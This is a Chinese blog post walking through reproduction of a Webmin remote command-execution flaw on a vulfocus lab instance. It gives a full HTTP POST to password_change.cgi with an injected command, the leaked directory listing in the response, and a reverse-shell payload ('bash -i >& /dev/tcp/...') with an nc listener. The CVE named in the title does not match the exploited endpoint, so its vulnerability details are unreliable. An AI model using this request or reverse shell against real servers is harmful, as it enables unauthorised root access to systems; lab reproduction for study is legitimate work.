• CVE202035606 Webmin命令执行复现


    漏洞详情:

    该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/\(-)|\(.)/string/g; 逃避不足以预防。 因此,由于包名变量直接放置在系统命令中,我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如,我们可以通过将命令行下一行来逃避控制。 我们可以使用 "%0A" 和 "%0C" urlencoded 行值来做到这一点。此外,为了使 paylad 正常工作,我们必须在有效负载的末尾添加双符号 (&&) (%26%26)

    复现过程:

    通过http://vulfocus.fofa.so/完成实验

    访问地址:https://vulfocus.fofa.so:48998/

    POST请求

    • POST /password_change.cgi HTTP/1.1

    Host: vulfocus.fofa.so:48998

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

    Accept-Encoding: gzip, deflate

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 55

    Origin: https://vulfocus.fofa.so:48998

    Connection: close

    Referer: https://vulfocus.fofa.so:48998/

    Cookie: redirect=1; testing=1

    Upgrade-Insecure-Requests: 1

    Sec-Fetch-Dest: document

    Sec-Fetch-Mode: navigate

    Sec-Fetch-Site: same-origin

    Sec-Fetch-User: ?1

    user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22

    响应:

    <center><h3>Failed to change password : The current password is incorrectCHANGELOG              config.info.ru.UTF-8      module.info.es.UTF-8

    acl-lib.pl        config.info.ru_RU   module.info.fr

    acl_security.pl        config.info.ru_RU.UTF-8  module.info.fr.UTF-8

    backup_config.pl   config.info.ru_SU   module.info.hu

    cert_form.cgi         config.info.sk                module.info.hu.UTF-8

    cert_issue.cgi         config.info.sk.UTF-8      module.info.it

    cert_output.cgi             config.info.sv                module.info.it.UTF-8

    cgi_args.pl            config.info.sv.UTF-8      module.info.ja_JP.UTF-8

    config                   config.info.tr          module.info.ja_JP.euc

    config-ALL-linux   config.info.uk_UA   module.info.ko_KR.UTF-8

    config-freebsd             config.info.uk_UA.UTF-8  module.info.ko_KR.euc

    config-macos       config.info.zh_CN         module.info.ms_MY

    config-netbsd              config.info.zh_CN.UTF-8  module.info.ms_MY.UTF-8

    config-openbsd           config.info.zh_TW.Big5   module.info.nl

    config-solaris-10-ALL  config.info.zh_TW.UTF-8  module.info.nl.UTF-8

    config-syno-linux convert.cgi            module.info.no

    config.info            convert_form.cgi   module.info.no.UTF-8

    config.info.ar         defaultacl              module.info.pl

    config.info.bg        delete_group.cgi    module.info.pl.UTF-8

    config.info.bg.UTF-8     delete_groups.cgi         module.info.pt

    config.info.ca        delete_session.cgi         module.info.pt.UTF-8

    config.info.ca.UTF-8     delete_user.cgi      module.info.pt_BR

    config.info.cz         delete_users.cgi     module.info.pt_BR.UTF-8

    config.info.cz.UTF-8      edit_acl.cgi            module.info.ru.UTF-8

    config.info.da        edit_group.cgi              module.info.ru_RU

    config.info.da.UTF-8     edit_pass.cgi          module.info.ru_RU.UTF-8

    config.info.de        edit_rbac.cgi          module.info.ru_SU

    config.info.de.UTF-8     edit_sql.cgi            module.info.sk

    config.info.es        edit_sync.cgi          module.info.sk.UTF-8

    config.info.es.UTF-8     edit_unix.cgi          module.info.sv

    config.info.eu        edit_user.cgi          module.info.sv.UTF-8

    config.info.eu.UTF-8     feedback_files.pl    module.info.tr

    config.info.fa         help                      module.info.zh_CN

    config.info.fr         images                  module.info.zh_TW.Big5

    config.info.fr.UTF-8      index.cgi               negativeacl

    config.info.hr        lang                      openssl.cnf

    config.info.hu        list_sessions.cgi     postinstall.pl

    config.info.hu.UTF-8     log_parser.pl         save_acl.cgi

    config.info.it          makedn.cgi           save_group.cgi

    config.info.it.UTF-8       maketables.cgi             save_pass.cgi

    config.info.ja_JP.UTF-8  md5-lib.pl            save_sql.cgi

    config.info.ja_JP.euc     module.info          save_sync.cgi

    config.info.ko_KR.UTF-8  module.info.ar           save_twofactor.cgi

    config.info.ko_KR.euc   module.info.bg             save_unix.cgi

    config.info.ms_MY module.info.bg.UTF-8   save_user.cgi

    config.info.ms_MY.UTF-8  module.info.ca                schema.cgi

    config.info.nl         module.info.ca.UTF-8   switch.cgi

    config.info.nl.UTF-8      module.info.cz              system_info.pl

    config.info.no        module.info.cz.UTF-8    twofactor.pl

    config.info.no.UTF-8     module.info.da             twofactor_form.cgi

    config.info.pl         module.info.da.UTF-8   useradmin_update.pl

    config.info.pl.UTF-8      module.info.de             webmin.schema

    config.info.pt_BR   module.info.de.UTF-8

    config.info.pt_BR.UTF-8  module.info.es

    </h3></center>

    <hr>

    </div>

    <div data-autocomplete="1" class="-shell-port-">

      <div class="-shell-port-container">

        <div data-shell-config><i aria-label="Configuration" class="fa fa-lg fa-cogs"></i></div>

        <div aria-label="Close" class="-shell-port-close"></div>

        <div data-output="true"><pre data-xconsole></pre></div>

        <div class="-shell-port-cmd">

          <span class="-shell-port-prompt"><span class="-shell-port-type">[@<span data-shell-host="2469abb357a9">2469abb357a9</span> <span class="-shell-port-pwd" data-home="/root" data-pwd="/root">~</span>]#</span></span><input type="text" data-command="true" autocomplete="off" spellcheck="false"><span class="-shell-port-cursor">&nbsp;</span>

        </div>

      </div>

    </div>

    <div class="top-aprogress"></div>

    </body>

    </html>

    反弹

    远程服务器:

    Nc -vvlp 8888

     test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"

  • 相关阅读:
    SQLServer 时间差运算
    phpStudy
    解决Apache/PHP无法启动的问题
    apche的主配置文件)
    知识总结
    学完了js的知识,一起分享总结知识点
    JS的学习体会与分享
    SpringBoot -- pom.xml文件
    c++基本知识点
    c语言基本常识5
  • 原文地址:https://www.cnblogs.com/MonkeyD/p/15622715.html
Copyright © 2020-2023  润新知